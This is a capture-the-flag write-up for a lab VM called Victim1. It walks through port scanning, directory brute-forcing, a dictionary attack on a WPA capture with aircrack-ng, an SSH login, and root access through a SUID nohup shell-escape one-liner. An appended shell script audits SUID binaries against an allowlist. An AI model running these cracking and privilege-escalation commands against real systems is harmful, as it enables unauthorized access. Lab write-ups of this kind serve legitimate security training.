CTF Victim1:

  1. Netdiscover
  2. rustscan
  3. Port 80
  4. Port 9000
  5. Port 8999
  6. WPA-01.cap
  7. SSH
  8. Enum
  9. Uncommon setuid

Netdiscover

sudo netdiscover

192.168.0.23

rustscan

rustscan -a 192.168.0.23

Output:

Port 80

gobuster dir -u http://192.168.0.23 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt

Output:

http://192.168.0.23/robots.txt

On some pages I have this error:

In the htaccess.txt file I find this message. I think it's a Joomla server.
http://192.168.0.23/htaccess.txt

End - Joomla! core SEF Section.

Port 9000

I can use gobuster on this page because it returns error 500 (Internal Server Error).

gobuster dir -u http://192.168.0.23:9000 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt --wildcard

Output:

But:

Nothing interesting.

Port 8999

It's useless to run a gobuster scan on this web server because we already have the directories: it's an "Index of /" page.

It's a webfs/1.21 server hosting a .cap file.
I have to open it with Wireshark.

WPA-01.cap


This is a capture of a wireless stream with the SSID dlink.
I have to use aircrack-ng to recover the password from the cap file with a dictionary attack.

aircrack-ng -w Documents/wordlist/rockyou.txt /home/peanutstick/Downloads/WPA-01.cap


The password for the SSID dlink is p4ssword.

SSH

I can use the user dlink to login via SSH.

ssh dlink@192.168.0.23

Enum


Can’t check the .bash_history.
With lse.sh:

There is nothing in /usr/bin/TryHarder!

Uncommon setuid

https://gtfobins.github.io/gtfobins/nohup/

I can't use the command with sudo.

/usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"


I’m root.
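The root cause here is a SUID bit on a binary that should never carry one. The following shell audit is an added example (not part of the writeup or lse.sh): it lists SUID files under a root directory and flags any not on a baseline allowlist; the allowlist and the demo tree are constructed for illustration, and the real baseline should be captured from a known-good build of the host.

```shell
#!/bin/sh
# Defender-side check: list SUID files under a root directory and flag any
# that are not on a known-good baseline. Constructed example; the allowlist
# below is illustrative, not a complete baseline for any distribution.

ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount"

# audit_suid ROOT: print SUID files under ROOT (paths relative to ROOT) that
# are not in ALLOWLIST. Returns 0 if none were found, 1 otherwise.
audit_suid() {
    root="$1"
    unexpected=$(find "$root" -type f -perm -4000 2>/dev/null |
        while IFS= read -r f; do
            rel=${f#"$root"}
            printf '%s\n' "$ALLOWLIST" | grep -qxF -- "$rel" || printf '%s\n' "$rel"
        done)
    [ -z "$unexpected" ] && return 0
    printf 'Unexpected SUID binaries:\n%s\n' "$unexpected"
    return 1
}

# make_demo_tree: build a constructed tree in a temp directory with two
# expected SUID files and one unexpected one (nohup, as found in the CTF).
# Prints the root path.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin"
    for b in passwd sudo nohup; do
        : > "$root/usr/bin/$b"
        chmod 4755 "$root/usr/bin/$b"
    done
    : > "$root/usr/bin/ls"
    chmod 755 "$root/usr/bin/ls"
    printf '%s' "$root"
}

# Stand-alone run: audit the constructed tree (exit status 1 means findings).
if [ "${1:-}" = "--demo" ]; then
    audit_suid "$(make_demo_tree)"
fi
```

Run against a live host with `audit_suid /` once the allowlist holds that host's expected SUID set; anything it prints, like /usr/bin/nohup here, is a privilege-escalation path to remove or explain.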